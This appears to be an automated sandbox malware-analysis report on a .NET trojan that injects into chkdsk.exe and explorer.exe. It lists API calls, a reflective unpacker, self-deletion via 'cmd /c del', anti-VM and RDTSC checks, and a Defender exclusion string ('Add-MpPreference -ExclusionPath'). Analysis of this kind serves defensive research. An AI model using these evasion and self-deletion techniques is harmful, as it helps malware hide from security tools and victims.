          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D80D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E528EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E520A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E522AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E52B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A98C80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A98C7F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A92D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04A92FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AACF03
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAC8EE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAC8F8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 04D8B150 appears 35 times
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041870C NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8690 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA87C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8710 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85DA NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA870C NtClose,
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.IdentifierJump to behavior
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/5
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: GV8EJooYMIgEnEk.exe, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_07164FF9 push es; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0716C325 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00419178 push ebp; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A10B push edi; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A2A7 push ebx; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00415C52 pushad ; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041CCCE push es; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AACCCE push es; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA5C52 pushad ; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB7D5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB88C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB82B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAB822 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA10B push edi; retf
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA9178 push ebp; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AAA2A7 push ebx; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.78260076892

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632Thread sleep time: -35216s >= -30000s
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5248Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 9.5 %
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 35216
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 922337203685477
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]
